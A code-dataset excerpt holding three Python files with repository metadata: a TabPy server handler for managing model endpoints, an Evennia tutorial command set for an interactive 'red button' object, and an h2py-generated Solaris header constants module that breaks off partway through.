text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
"""
HTTP handeler to serve specific endpoint request like
http://myserver:9004/endpoints/mymodel
For how generic endpoints requests is served look
at endpoints_handler.py
"""
import json
import logging
import shutil
from tabpy.tabpy_server.common.util import format_exception
from tabpy.tabpy_server.handlers import ManagementHandler
from tabpy.tabpy_server.handlers.base_handler import STAGING_THREAD
from tabpy.tabpy_server.management.state import get_query_object_path
from tabpy.tabpy_server.psws.callbacks import on_state_change
from tabpy.tabpy_server.handlers.util import AuthErrorStates
from tornado import gen
class EndpointHandler(ManagementHandler):
def initialize(self, app):
super(EndpointHandler, self).initialize(app)
def get(self, endpoint_name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing GET for /endpoints/{endpoint_name}")
self._add_CORS_header()
if not endpoint_name:
self.write(json.dumps(self.tabpy_state.get_endpoints()))
else:
if endpoint_name in self.tabpy_state.get_endpoints():
self.write(json.dumps(self.tabpy_state.get_endpoints()[endpoint_name]))
else:
self.error_out(
404,
"Unknown endpoint",
info=f"Endpoint {endpoint_name} is not found",
)
@gen.coroutine
def put(self, name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing PUT for /endpoints/{name}")
try:
if not self.request.body:
self.error_out(400, "Input body cannot be empty")
self.finish()
return
try:
request_data = json.loads(self.request.body.decode("utf-8"))
except BaseException as ex:
self.error_out(
400, log_message="Failed to decode input body", info=str(ex)
)
self.finish()
return
# check if endpoint exists
endpoints = self.tabpy_state.get_endpoints(name)
if len(endpoints) == 0:
self.error_out(404, f"endpoint {name} does not exist.")
self.finish()
return
new_version = int(endpoints[name]["version"]) + 1
self.logger.log(logging.INFO, f"Endpoint info: {request_data}")
err_msg = yield self._add_or_update_endpoint(
"update", name, new_version, request_data
)
if err_msg:
self.error_out(400, err_msg)
self.finish()
else:
self.write(self.tabpy_state.get_endpoints(name))
self.finish()
except Exception as e:
err_msg = format_exception(e, "update_endpoint")
self.error_out(500, err_msg)
self.finish()
@gen.coroutine
def delete(self, name):
if self.should_fail_with_auth_error() != AuthErrorStates.NONE:
self.fail_with_auth_error()
return
self.logger.log(logging.DEBUG, f"Processing DELETE for /endpoints/{name}")
try:
endpoints = self.tabpy_state.get_endpoints(name)
if len(endpoints) == 0:
self.error_out(404, f"endpoint {name} does not exist.")
self.finish()
return
# update state
try:
endpoint_info = self.tabpy_state.delete_endpoint(name)
except Exception as e:
self.error_out(400, f"Error when removing endpoint: {e.message}")
self.finish()
return
# delete files
if endpoint_info["type"] != "alias":
delete_path = get_query_object_path(
self.settings["state_file_path"], name, None
)
try:
yield self._delete_po_future(delete_path)
except Exception as e:
self.error_out(400, f"Error while deleting: {e}")
self.finish()
return
self.set_status(204)
self.finish()
except Exception as e:
err_msg = format_exception(e, "delete endpoint")
self.error_out(500, err_msg)
self.finish()
on_state_change(
self.settings, self.tabpy_state, self.python_service, self.logger
)
@gen.coroutine
def _delete_po_future(self, delete_path):
future = STAGING_THREAD.submit(shutil.rmtree, delete_path)
ret = yield future
raise gen.Return(ret)
|
tableau/TabPy
|
tabpy/tabpy_server/handlers/endpoint_handler.py
|
Python
|
mit
| 4,926 | 0.001015 |
"""
This defines the cmdset for the red_button. Here we have defined
the commands and the cmdset in the same module, but if you
have many different commands to merge it is often better
to define the cmdset separately, picking and choosing from
among the available commands as to what should be included in the
cmdset - this way you can often re-use the commands too.
"""
import random
from evennia import Command, CmdSet
# Some simple commands for the red button
# ------------------------------------------------------------
# Commands defined on the red button
# ------------------------------------------------------------
class CmdNudge(Command):
"""
Try to nudge the button's lid
Usage:
nudge lid
This command will have you try to
push the lid of the button away.
"""
key = "nudge lid" # two-word command name!
aliases = ["nudge"]
locks = "cmd:all()"
def func(self):
"""
nudge the lid. Random chance of success to open it.
"""
rand = random.random()
if rand < 0.5:
self.caller.msg("You nudge at the lid. It seems stuck.")
elif rand < 0.7:
self.caller.msg("You move the lid back and forth. It won't budge.")
else:
self.caller.msg("You manage to get a nail under the lid.")
self.caller.execute_cmd("open lid")
class CmdPush(Command):
"""
Push the red button
Usage:
push button
"""
key = "push button"
aliases = ["push", "press button", "press"]
locks = "cmd:all()"
def func(self):
"""
Note that we choose to implement this with checking for
if the lid is open/closed. This is because this command
is likely to be tried regardless of the state of the lid.
An alternative would be to make two versions of this command
and tuck them into the cmdset linked to the Open and Closed
lid-state respectively.
"""
if self.obj.db.lid_open:
string = "You reach out to press the big red button ..."
string += "\n\nA BOOM! A bright light blinds you!"
string += "\nThe world goes dark ..."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s presses the button. BOOM! %s is blinded by a flash!"
% (self.caller.name, self.caller.name),
exclude=self.caller,
)
# the button's method will handle all setup of scripts etc.
self.obj.press_button(self.caller)
else:
string = "You cannot push the button - there is a glass lid covering it."
self.caller.msg(string)
class CmdSmashGlass(Command):
"""
smash glass
Usage:
smash glass
Try to smash the glass of the button.
"""
key = "smash glass"
aliases = ["smash lid", "break lid", "smash"]
locks = "cmd:all()"
def func(self):
"""
The lid won't open, but there is a small chance
of causing the lamp to break.
"""
rand = random.random()
if rand < 0.2:
string = "You smash your hand against the glass"
string += " with all your might. The lid won't budge"
string += " but you cause quite the tremor through the button's mount."
string += "\nIt looks like the button's lamp stopped working for the time being."
self.obj.lamp_works = False
elif rand < 0.6:
string = "You hit the lid hard. It doesn't move an inch."
else:
string = "You place a well-aimed fist against the glass of the lid."
string += " Unfortunately all you get is a pain in your hand. Maybe"
string += " you should just try to open the lid instead?"
self.caller.msg(string)
self.caller.location.msg_contents(
"%s tries to smash the glass of the button." % (self.caller.name), exclude=self.caller
)
class CmdOpenLid(Command):
"""
open lid
Usage:
open lid
"""
key = "open lid"
aliases = ["open button", "open"]
locks = "cmd:all()"
def func(self):
"simply call the right function."
if self.obj.db.lid_locked:
self.caller.msg("This lid seems locked in place for the moment.")
return
string = "\nA ticking sound is heard, like a winding mechanism. Seems "
string += "the lid will soon close again."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s opens the lid of the button." % (self.caller.name), exclude=self.caller
)
# add the relevant cmdsets to button
self.obj.cmdset.add(LidClosedCmdSet)
# call object method
self.obj.open_lid()
class CmdCloseLid(Command):
"""
close the lid
Usage:
close lid
Closes the lid of the red button.
"""
key = "close lid"
aliases = ["close"]
locks = "cmd:all()"
def func(self):
"Close the lid"
self.obj.close_lid()
# this will clean out scripts dependent on lid being open.
self.caller.msg("You close the button's lid. It clicks back into place.")
self.caller.location.msg_contents(
"%s closes the button's lid." % (self.caller.name), exclude=self.caller
)
class CmdBlindLook(Command):
"""
Looking around in darkness
Usage:
look <obj>
... not that there's much to see in the dark.
"""
key = "look"
aliases = ["l", "get", "examine", "ex", "feel", "listen"]
locks = "cmd:all()"
def func(self):
"This replaces all the senses when blinded."
# we decide what to reply based on which command was
# actually tried
if self.cmdstring == "get":
string = "You fumble around blindly without finding anything."
elif self.cmdstring == "examine":
string = "You try to examine your surroundings, but can't see a thing."
elif self.cmdstring == "listen":
string = "You are deafened by the boom."
elif self.cmdstring == "feel":
string = "You fumble around, hands outstretched. You bump your knee."
else:
# trying to look
string = "You are temporarily blinded by the flash. "
string += "Until it wears off, all you can do is feel around blindly."
self.caller.msg(string)
self.caller.location.msg_contents(
"%s stumbles around, blinded." % (self.caller.name), exclude=self.caller
)
class CmdBlindHelp(Command):
"""
Help function while in the blinded state
Usage:
help
"""
key = "help"
aliases = "h"
locks = "cmd:all()"
def func(self):
"Give a message."
self.caller.msg("You are beyond help ... until you can see again.")
# ---------------------------------------------------------------
# Command sets for the red button
# ---------------------------------------------------------------
# We next tuck these commands into their respective command sets.
# (note that we are overdoing the cdmset separation a bit here
# to show how it works).
class DefaultCmdSet(CmdSet):
"""
The default cmdset always sits
on the button object and whereas other
command sets may be added/merge onto it
and hide it, removing them will always
bring it back. It's added to the object
using obj.cmdset.add_default().
"""
key = "RedButtonDefault"
mergetype = "Union" # this is default, we don't really need to put it here.
def at_cmdset_creation(self):
"Init the cmdset"
self.add(CmdPush())
class LidClosedCmdSet(CmdSet):
"""
A simple cmdset tied to the redbutton object.
It contains the commands that launches the other
command sets, making the red button a self-contained
item (i.e. you don't have to manually add any
scripts etc to it when creating it).
"""
key = "LidClosedCmdSet"
# default Union is used *except* if we are adding to a
# cmdset named LidOpenCmdSet - this one we replace
# completely.
key_mergetype = {"LidOpenCmdSet": "Replace"}
def at_cmdset_creation(self):
"Populates the cmdset when it is instantiated."
self.add(CmdNudge())
self.add(CmdSmashGlass())
self.add(CmdOpenLid())
class LidOpenCmdSet(CmdSet):
"""
This is the opposite of the Closed cmdset.
"""
key = "LidOpenCmdSet"
# default Union is used *except* if we are adding to a
# cmdset named LidClosedCmdSet - this one we replace
# completely.
key_mergetype = {"LidClosedCmdSet": "Replace"}
def at_cmdset_creation(self):
"setup the cmdset (just one command)"
self.add(CmdCloseLid())
class BlindCmdSet(CmdSet):
"""
This is the cmdset added to the *account* when
the button is pushed.
"""
key = "BlindCmdSet"
# we want it to completely replace all normal commands
# until the timed script removes it again.
mergetype = "Replace"
# we want to stop the account from walking around
# in this blinded state, so we hide all exits too.
# (channel commands will still work).
no_exits = True # keep account in the same room
no_objs = True # don't allow object commands
def at_cmdset_creation(self):
"Setup the blind cmdset"
from evennia.commands.default.general import CmdSay
from evennia.commands.default.general import CmdPose
self.add(CmdSay())
self.add(CmdPose())
self.add(CmdBlindLook())
self.add(CmdBlindHelp())
|
jamesbeebop/evennia
|
evennia/contrib/tutorial_examples/cmdset_red_button.py
|
Python
|
bsd-3-clause
| 9,705 | 0.001443 |
# Generated by h2py from /usr/include/netinet/in.h
# Included from sys/feature_tests.h
# Included from sys/isa_defs.h
_CHAR_ALIGNMENT = 1
_SHORT_ALIGNMENT = 2
_INT_ALIGNMENT = 4
_LONG_ALIGNMENT = 8
_LONG_LONG_ALIGNMENT = 8
_DOUBLE_ALIGNMENT = 8
_LONG_DOUBLE_ALIGNMENT = 16
_POINTER_ALIGNMENT = 8
_MAX_ALIGNMENT = 16
_ALIGNMENT_REQUIRED = 1
_CHAR_ALIGNMENT = 1
_SHORT_ALIGNMENT = 2
_INT_ALIGNMENT = 4
_LONG_ALIGNMENT = 4
_LONG_LONG_ALIGNMENT = 4
_DOUBLE_ALIGNMENT = 4
_LONG_DOUBLE_ALIGNMENT = 4
_POINTER_ALIGNMENT = 4
_MAX_ALIGNMENT = 4
_ALIGNMENT_REQUIRED = 0
_CHAR_ALIGNMENT = 1
_SHORT_ALIGNMENT = 2
_INT_ALIGNMENT = 4
_LONG_LONG_ALIGNMENT = 8
_DOUBLE_ALIGNMENT = 8
_ALIGNMENT_REQUIRED = 1
_LONG_ALIGNMENT = 4
_LONG_DOUBLE_ALIGNMENT = 8
_POINTER_ALIGNMENT = 4
_MAX_ALIGNMENT = 8
_LONG_ALIGNMENT = 8
_LONG_DOUBLE_ALIGNMENT = 16
_POINTER_ALIGNMENT = 8
_MAX_ALIGNMENT = 16
_POSIX_C_SOURCE = 1
_LARGEFILE64_SOURCE = 1
_LARGEFILE_SOURCE = 1
_FILE_OFFSET_BITS = 64
_FILE_OFFSET_BITS = 32
_POSIX_C_SOURCE = 199506L
_POSIX_PTHREAD_SEMANTICS = 1
_XOPEN_VERSION = 500
_XOPEN_VERSION = 4
_XOPEN_VERSION = 3
from TYPES import *
# Included from sys/stream.h
# Included from sys/vnode.h
from TYPES import *
# Included from sys/t_lock.h
# Included from sys/machlock.h
from TYPES import *
LOCK_HELD_VALUE = 0xff
def SPIN_LOCK(pl): return ((pl) > ipltospl(LOCK_LEVEL))
def LOCK_SAMPLE_INTERVAL(i): return (((i) & 0xff) == 0)
CLOCK_LEVEL = 10
LOCK_LEVEL = 10
DISP_LEVEL = (LOCK_LEVEL + 1)
PTR24_LSB = 5
PTR24_MSB = (PTR24_LSB + 24)
PTR24_ALIGN = 32
PTR24_BASE = 0xe0000000
# Included from sys/param.h
from TYPES import *
_POSIX_VDISABLE = 0
MAX_INPUT = 512
MAX_CANON = 256
UID_NOBODY = 60001
GID_NOBODY = UID_NOBODY
UID_NOACCESS = 60002
MAX_TASKID = 999999
MAX_MAXPID = 999999
DEFAULT_MAXPID = 999999
DEFAULT_JUMPPID = 100000
DEFAULT_MAXPID = 30000
DEFAULT_JUMPPID = 0
MAXUID = 2147483647
MAXPROJID = MAXUID
MAXLINK = 32767
NMOUNT = 40
CANBSIZ = 256
NOFILE = 20
NGROUPS_UMIN = 0
NGROUPS_UMAX = 32
NGROUPS_MAX_DEFAULT = 16
NZERO = 20
NULL = 0L
NULL = 0
CMASK = 022
CDLIMIT = (1L<<11)
NBPS = 0x20000
NBPSCTR = 512
UBSIZE = 512
SCTRSHFT = 9
SYSNAME = 9
PREMOTE = 39
MAXPATHLEN = 1024
MAXSYMLINKS = 20
MAXNAMELEN = 256
NADDR = 13
PIPE_BUF = 5120
PIPE_MAX = 5120
NBBY = 8
MAXBSIZE = 8192
DEV_BSIZE = 512
DEV_BSHIFT = 9
MAXFRAG = 8
MAXOFF32_T = 0x7fffffff
MAXOFF_T = 0x7fffffffffffffffl
MAXOFFSET_T = 0x7fffffffffffffffl
MAXOFF_T = 0x7fffffffl
MAXOFFSET_T = 0x7fffffff
def btodb(bytes): return \
def dbtob(db): return \
def lbtodb(bytes): return \
def ldbtob(db): return \
NCARGS32 = 0x100000
NCARGS64 = 0x200000
NCARGS = NCARGS64
NCARGS = NCARGS32
FSHIFT = 8
FSCALE = (1<<FSHIFT)
def DELAY(n): return drv_usecwait(n)
def mmu_ptob(x): return ((x) << MMU_PAGESHIFT)
def mmu_btop(x): return (((x)) >> MMU_PAGESHIFT)
def mmu_btopr(x): return ((((x) + MMU_PAGEOFFSET) >> MMU_PAGESHIFT))
def mmu_ptod(x): return ((x) << (MMU_PAGESHIFT - DEV_BSHIFT))
def ptod(x): return ((x) << (PAGESHIFT - DEV_BSHIFT))
def ptob(x): return ((x) << PAGESHIFT)
def btop(x): return (((x) >> PAGESHIFT))
def btopr(x): return ((((x) + PAGEOFFSET) >> PAGESHIFT))
def dtop(DD): return (((DD) + NDPP - 1) >> (PAGESHIFT - DEV_BSHIFT))
def dtopt(DD): return ((DD) >> (PAGESHIFT - DEV_BSHIFT))
_AIO_LISTIO_MAX = (4096)
_AIO_MAX = (-1)
_MQ_OPEN_MAX = (32)
_MQ_PRIO_MAX = (32)
_SEM_NSEMS_MAX = INT_MAX
_SEM_VALUE_MAX = INT_MAX
# Included from sys/unistd.h
_CS_PATH = 65
_CS_LFS_CFLAGS = 68
_CS_LFS_LDFLAGS = 69
_CS_LFS_LIBS = 70
_CS_LFS_LINTFLAGS = 71
_CS_LFS64_CFLAGS = 72
_CS_LFS64_LDFLAGS = 73
_CS_LFS64_LIBS = 74
_CS_LFS64_LINTFLAGS = 75
_CS_XBS5_ILP32_OFF32_CFLAGS = 700
_CS_XBS5_ILP32_OFF32_LDFLAGS = 701
_CS_XBS5_ILP32_OFF32_LIBS = 702
_CS_XBS5_ILP32_OFF32_LINTFLAGS = 703
_CS_XBS5_ILP32_OFFBIG_CFLAGS = 705
_CS_XBS5_ILP32_OFFBIG_LDFLAGS = 706
_CS_XBS5_ILP32_OFFBIG_LIBS = 707
_CS_XBS5_ILP32_OFFBIG_LINTFLAGS = 708
_CS_XBS5_LP64_OFF64_CFLAGS = 709
_CS_XBS5_LP64_OFF64_LDFLAGS = 710
_CS_XBS5_LP64_OFF64_LIBS = 711
_CS_XBS5_LP64_OFF64_LINTFLAGS = 712
_CS_XBS5_LPBIG_OFFBIG_CFLAGS = 713
_CS_XBS5_LPBIG_OFFBIG_LDFLAGS = 714
_CS_XBS5_LPBIG_OFFBIG_LIBS = 715
_CS_XBS5_LPBIG_OFFBIG_LINTFLAGS = 716
_SC_ARG_MAX = 1
_SC_CHILD_MAX = 2
_SC_CLK_TCK = 3
_SC_NGROUPS_MAX = 4
_SC_OPEN_MAX = 5
_SC_JOB_CONTROL = 6
_SC_SAVED_IDS = 7
_SC_VERSION = 8
_SC_PASS_MAX = 9
_SC_LOGNAME_MAX = 10
_SC_PAGESIZE = 11
_SC_XOPEN_VERSION = 12
_SC_NPROCESSORS_CONF = 14
_SC_NPROCESSORS_ONLN = 15
_SC_STREAM_MAX = 16
_SC_TZNAME_MAX = 17
_SC_AIO_LISTIO_MAX = 18
_SC_AIO_MAX = 19
_SC_AIO_PRIO_DELTA_MAX = 20
_SC_ASYNCHRONOUS_IO = 21
_SC_DELAYTIMER_MAX = 22
_SC_FSYNC = 23
_SC_MAPPED_FILES = 24
_SC_MEMLOCK = 25
_SC_MEMLOCK_RANGE = 26
_SC_MEMORY_PROTECTION = 27
_SC_MESSAGE_PASSING = 28
_SC_MQ_OPEN_MAX = 29
_SC_MQ_PRIO_MAX = 30
_SC_PRIORITIZED_IO = 31
_SC_PRIORITY_SCHEDULING = 32
_SC_REALTIME_SIGNALS = 33
_SC_RTSIG_MAX = 34
_SC_SEMAPHORES = 35
_SC_SEM_NSEMS_MAX = 36
_SC_SEM_VALUE_MAX = 37
_SC_SHARED_MEMORY_OBJECTS = 38
_SC_SIGQUEUE_MAX = 39
_SC_SIGRT_MIN = 40
_SC_SIGRT_MAX = 41
_SC_SYNCHRONIZED_IO = 42
_SC_TIMERS = 43
_SC_TIMER_MAX = 44
_SC_2_C_BIND = 45
_SC_2_C_DEV = 46
_SC_2_C_VERSION = 47
_SC_2_FORT_DEV = 48
_SC_2_FORT_RUN = 49
_SC_2_LOCALEDEF = 50
_SC_2_SW_DEV = 51
_SC_2_UPE = 52
_SC_2_VERSION = 53
_SC_BC_BASE_MAX = 54
_SC_BC_DIM_MAX = 55
_SC_BC_SCALE_MAX = 56
_SC_BC_STRING_MAX = 57
_SC_COLL_WEIGHTS_MAX = 58
_SC_EXPR_NEST_MAX = 59
_SC_LINE_MAX = 60
_SC_RE_DUP_MAX = 61
_SC_XOPEN_CRYPT = 62
_SC_XOPEN_ENH_I18N = 63
_SC_XOPEN_SHM = 64
_SC_2_CHAR_TERM = 66
_SC_XOPEN_XCU_VERSION = 67
_SC_ATEXIT_MAX = 76
_SC_IOV_MAX = 77
_SC_XOPEN_UNIX = 78
_SC_PAGE_SIZE = _SC_PAGESIZE
_SC_T_IOV_MAX = 79
_SC_PHYS_PAGES = 500
_SC_AVPHYS_PAGES = 501
_SC_COHER_BLKSZ = 503
_SC_SPLIT_CACHE = 504
_SC_ICACHE_SZ = 505
_SC_DCACHE_SZ = 506
_SC_ICACHE_LINESZ = 507
_SC_DCACHE_LINESZ = 508
_SC_ICACHE_BLKSZ = 509
_SC_DCACHE_BLKSZ = 510
_SC_DCACHE_TBLKSZ = 511
_SC_ICACHE_ASSOC = 512
_SC_DCACHE_ASSOC = 513
_SC_MAXPID = 514
_SC_STACK_PROT = 515
_SC_THREAD_DESTRUCTOR_ITERATIONS = 568
_SC_GETGR_R_SIZE_MAX = 569
_SC_GETPW_R_SIZE_MAX = 570
_SC_LOGIN_NAME_MAX = 571
_SC_THREAD_KEYS_MAX = 572
_SC_THREAD_STACK_MIN = 573
_SC_THREAD_THREADS_MAX = 574
_SC_TTY_NAME_MAX = 575
_SC_THREADS = 576
_SC_THREAD_ATTR_STACKADDR = 577
_SC_THREAD_ATTR_STACKSIZE = 578
_SC_THREAD_PRIORITY_SCHEDULING = 579
_SC_THREAD_PRIO_INHERIT = 580
_SC_THREAD_PRIO_PROTECT = 581
_SC_THREAD_PROCESS_SHARED = 582
_SC_THREAD_SAFE_FUNCTIONS = 583
_SC_XOPEN_LEGACY = 717
_SC_XOPEN_REALTIME = 718
_SC_XOPEN_REALTIME_THREADS = 719
_SC_XBS5_ILP32_OFF32 = 720
_SC_XBS5_ILP32_OFFBIG = 721
_SC_XBS5_LP64_OFF64 = 722
_SC_XBS5_LPBIG_OFFBIG = 723
_PC_LINK_MAX = 1
_PC_MAX_CANON = 2
_PC_MAX_INPUT = 3
_PC_NAME_MAX = 4
_PC_PATH_MAX = 5
_PC_PIPE_BUF = 6
_PC_NO_TRUNC = 7
_PC_VDISABLE = 8
_PC_CHOWN_RESTRICTED = 9
_PC_ASYNC_IO = 10
_PC_PRIO_IO = 11
_PC_SYNC_IO = 12
_PC_FILESIZEBITS = 67
_PC_LAST = 67
_POSIX_VERSION = 199506L
_POSIX2_VERSION = 199209L
_POSIX2_C_VERSION = 199209L
_XOPEN_XCU_VERSION = 4
_XOPEN_REALTIME = 1
_XOPEN_ENH_I18N = 1
_XOPEN_SHM = 1
_POSIX2_C_BIND = 1
_POSIX2_CHAR_TERM = 1
_POSIX2_LOCALEDEF = 1
_POSIX2_C_DEV = 1
_POSIX2_SW_DEV = 1
_POSIX2_UPE = 1
# Included from sys/mutex.h
from TYPES import *
def MUTEX_HELD(x): return (mutex_owned(x))
# Included from sys/rwlock.h
from TYPES import *
def RW_READ_HELD(x): return (rw_read_held((x)))
def RW_WRITE_HELD(x): return (rw_write_held((x)))
def RW_LOCK_HELD(x): return (rw_lock_held((x)))
def RW_ISWRITER(x): return (rw_iswriter(x))
# Included from sys/semaphore.h
# Included from sys/thread.h
from TYPES import *
# Included from sys/klwp.h
from TYPES import *
# Included from sys/condvar.h
from TYPES import *
# Included from sys/time.h
# Included from sys/types32.h
# Included from sys/int_types.h
TIME32_MAX = INT32_MAX
TIME32_MIN = INT32_MIN
def TIMEVAL_OVERFLOW(tv): return \
from TYPES import *
DST_NONE = 0
DST_USA = 1
DST_AUST = 2
DST_WET = 3
DST_MET = 4
DST_EET = 5
DST_CAN = 6
DST_GB = 7
DST_RUM = 8
DST_TUR = 9
DST_AUSTALT = 10
ITIMER_REAL = 0
ITIMER_VIRTUAL = 1
ITIMER_PROF = 2
ITIMER_REALPROF = 3
def ITIMERVAL_OVERFLOW(itv): return \
SEC = 1
MILLISEC = 1000
MICROSEC = 1000000
NANOSEC = 1000000000
# Included from sys/time_impl.h
def TIMESPEC_OVERFLOW(ts): return \
def ITIMERSPEC_OVERFLOW(it): return \
__CLOCK_REALTIME0 = 0
CLOCK_VIRTUAL = 1
CLOCK_PROF = 2
__CLOCK_REALTIME3 = 3
CLOCK_HIGHRES = 4
CLOCK_MAX = 5
CLOCK_REALTIME = __CLOCK_REALTIME3
CLOCK_REALTIME = __CLOCK_REALTIME0
TIMER_RELTIME = 0x0
TIMER_ABSTIME = 0x1
def TICK_TO_SEC(tick): return ((tick) / hz)
def SEC_TO_TICK(sec): return ((sec) * hz)
def TICK_TO_MSEC(tick): return \
def MSEC_TO_TICK(msec): return \
def MSEC_TO_TICK_ROUNDUP(msec): return \
def TICK_TO_USEC(tick): return ((tick) * usec_per_tick)
def USEC_TO_TICK(usec): return ((usec) / usec_per_tick)
def USEC_TO_TICK_ROUNDUP(usec): return \
def TICK_TO_NSEC(tick): return ((tick) * nsec_per_tick)
def NSEC_TO_TICK(nsec): return ((nsec) / nsec_per_tick)
def NSEC_TO_TICK_ROUNDUP(nsec): return \
def TIMEVAL_TO_TICK(tvp): return \
def TIMESTRUC_TO_TICK(tsp): return \
# Included from time.h
from TYPES import *
# Included from iso/time_iso.h
NULL = 0L
NULL = 0
CLOCKS_PER_SEC = 1000000
# Included from sys/select.h
FD_SETSIZE = 65536
FD_SETSIZE = 1024
_NBBY = 8
NBBY = _NBBY
def FD_ZERO(p): return bzero((p), sizeof (*(p)))
# Included from sys/signal.h
# Included from sys/iso/signal_iso.h
SIGHUP = 1
SIGINT = 2
SIGQUIT = 3
SIGILL = 4
SIGTRAP = 5
SIGIOT = 6
SIGABRT = 6
SIGEMT = 7
SIGFPE = 8
SIGKILL = 9
SIGBUS = 10
SIGSEGV = 11
SIGSYS = 12
SIGPIPE = 13
SIGALRM = 14
SIGTERM = 15
SIGUSR1 = 16
SIGUSR2 = 17
SIGCLD = 18
SIGCHLD = 18
SIGPWR = 19
SIGWINCH = 20
SIGURG = 21
SIGPOLL = 22
SIGIO = SIGPOLL
SIGSTOP = 23
SIGTSTP = 24
SIGCONT = 25
SIGTTIN = 26
SIGTTOU = 27
SIGVTALRM = 28
SIGPROF = 29
SIGXCPU = 30
SIGXFSZ = 31
SIGWAITING = 32
SIGLWP = 33
SIGFREEZE = 34
SIGTHAW = 35
SIGCANCEL = 36
SIGLOST = 37
_SIGRTMIN = 38
_SIGRTMAX = 45
SIG_BLOCK = 1
SIG_UNBLOCK = 2
SIG_SETMASK = 3
SIGNO_MASK = 0xFF
SIGDEFER = 0x100
SIGHOLD = 0x200
SIGRELSE = 0x400
SIGIGNORE = 0x800
SIGPAUSE = 0x1000
# Included from sys/siginfo.h
from TYPES import *
SIGEV_NONE = 1
SIGEV_SIGNAL = 2
SIGEV_THREAD = 3
SI_NOINFO = 32767
SI_USER = 0
SI_LWP = (-1)
SI_QUEUE = (-2)
SI_TIMER = (-3)
SI_ASYNCIO = (-4)
SI_MESGQ = (-5)
# Included from sys/machsig.h
ILL_ILLOPC = 1
ILL_ILLOPN = 2
ILL_ILLADR = 3
ILL_ILLTRP = 4
ILL_PRVOPC = 5
ILL_PRVREG = 6
ILL_COPROC = 7
ILL_BADSTK = 8
NSIGILL = 8
EMT_TAGOVF = 1
EMT_CPCOVF = 2
NSIGEMT = 2
FPE_INTDIV = 1
FPE_INTOVF = 2
FPE_FLTDIV = 3
FPE_FLTOVF = 4
FPE_FLTUND = 5
FPE_FLTRES = 6
FPE_FLTINV = 7
FPE_FLTSUB = 8
NSIGFPE = 8
SEGV_MAPERR = 1
SEGV_ACCERR = 2
NSIGSEGV = 2
BUS_ADRALN = 1
BUS_ADRERR = 2
BUS_OBJERR = 3
NSIGBUS = 3
TRAP_BRKPT = 1
TRAP_TRACE = 2
TRAP_RWATCH = 3
TRAP_WWATCH = 4
TRAP_XWATCH = 5
NSIGTRAP = 5
CLD_EXITED = 1
CLD_KILLED = 2
CLD_DUMPED = 3
CLD_TRAPPED = 4
CLD_STOPPED = 5
CLD_CONTINUED = 6
NSIGCLD = 6
POLL_IN = 1
POLL_OUT = 2
POLL_MSG = 3
POLL_ERR = 4
POLL_PRI = 5
POLL_HUP = 6
NSIGPOLL = 6
PROF_SIG = 1
NSIGPROF = 1
SI_MAXSZ = 256
SI_MAXSZ = 128
# Included from sys/time_std_impl.h
from TYPES import *
SI32_MAXSZ = 128
def SI_CANQUEUE(c): return ((c) <= SI_QUEUE)
SA_NOCLDSTOP = 0x00020000
SA_ONSTACK = 0x00000001
SA_RESETHAND = 0x00000002
SA_RESTART = 0x00000004
SA_SIGINFO = 0x00000008
SA_NODEFER = 0x00000010
SA_NOCLDWAIT = 0x00010000
SA_WAITSIG = 0x00010000
NSIG = 46
MAXSIG = 45
S_SIGNAL = 1
S_SIGSET = 2
S_SIGACTION = 3
S_NONE = 4
MINSIGSTKSZ = 2048
SIGSTKSZ = 8192
SS_ONSTACK = 0x00000001
SS_DISABLE = 0x00000002
SN_PROC = 1
SN_CANCEL = 2
SN_SEND = 3
# Included from sys/ucontext.h
from TYPES import *
# Included from sys/regset.h
REG_CCR = (0)
REG_PSR = (0)
REG_PSR = (0)
REG_PC = (1)
REG_nPC = (2)
REG_Y = (3)
REG_G1 = (4)
REG_G2 = (5)
REG_G3 = (6)
REG_G4 = (7)
REG_G5 = (8)
REG_G6 = (9)
REG_G7 = (10)
REG_O0 = (11)
REG_O1 = (12)
REG_O2 = (13)
REG_O3 = (14)
REG_O4 = (15)
REG_O5 = (16)
REG_O6 = (17)
REG_O7 = (18)
REG_ASI = (19)
REG_FPRS = (20)
REG_PS = REG_PSR
REG_SP = REG_O6
REG_R0 = REG_O0
REG_R1 = REG_O1
_NGREG = 21
_NGREG = 19
NGREG = _NGREG
_NGREG32 = 19
_NGREG64 = 21
SPARC_MAXREGWINDOW = 31
MAXFPQ = 16
XRS_ID = 0x78727300
# Included from v7/sys/privregs.h
# Included from v7/sys/psr.h
PSR_CWP = 0x0000001F
PSR_ET = 0x00000020
PSR_PS = 0x00000040
PSR_S = 0x00000080
PSR_PIL = 0x00000F00
PSR_EF = 0x00001000
PSR_EC = 0x00002000
PSR_RSV = 0x000FC000
PSR_ICC = 0x00F00000
PSR_C = 0x00100000
PSR_V = 0x00200000
PSR_Z = 0x00400000
PSR_N = 0x00800000
PSR_VER = 0x0F000000
PSR_IMPL = 0xF0000000
PSL_ALLCC = PSR_ICC
PSL_USER = (PSR_S)
PSL_USERMASK = (PSR_ICC)
PSL_UBITS = (PSR_ICC|PSR_EF)
def USERMODE(ps): return (((ps) & PSR_PS) == 0)
# Included from sys/fsr.h
FSR_CEXC = 0x0000001f
FSR_AEXC = 0x000003e0
FSR_FCC = 0x00000c00
FSR_PR = 0x00001000
FSR_QNE = 0x00002000
FSR_FTT = 0x0001c000
FSR_VER = 0x000e0000
FSR_TEM = 0x0f800000
FSR_RP = 0x30000000
FSR_RD = 0xc0000000
FSR_VER_SHIFT = 17
FSR_FCC1 = 0x00000003
FSR_FCC2 = 0x0000000C
FSR_FCC3 = 0x00000030
FSR_CEXC_NX = 0x00000001
FSR_CEXC_DZ = 0x00000002
FSR_CEXC_UF = 0x00000004
FSR_CEXC_OF = 0x00000008
FSR_CEXC_NV = 0x00000010
FSR_AEXC_NX = (0x1 << 5)
FSR_AEXC_DZ = (0x2 << 5)
FSR_AEXC_UF = (0x4 << 5)
FSR_AEXC_OF = (0x8 << 5)
FSR_AEXC_NV = (0x10 << 5)
FTT_NONE = 0
FTT_IEEE = 1
FTT_UNFIN = 2
FTT_UNIMP = 3
FTT_SEQ = 4
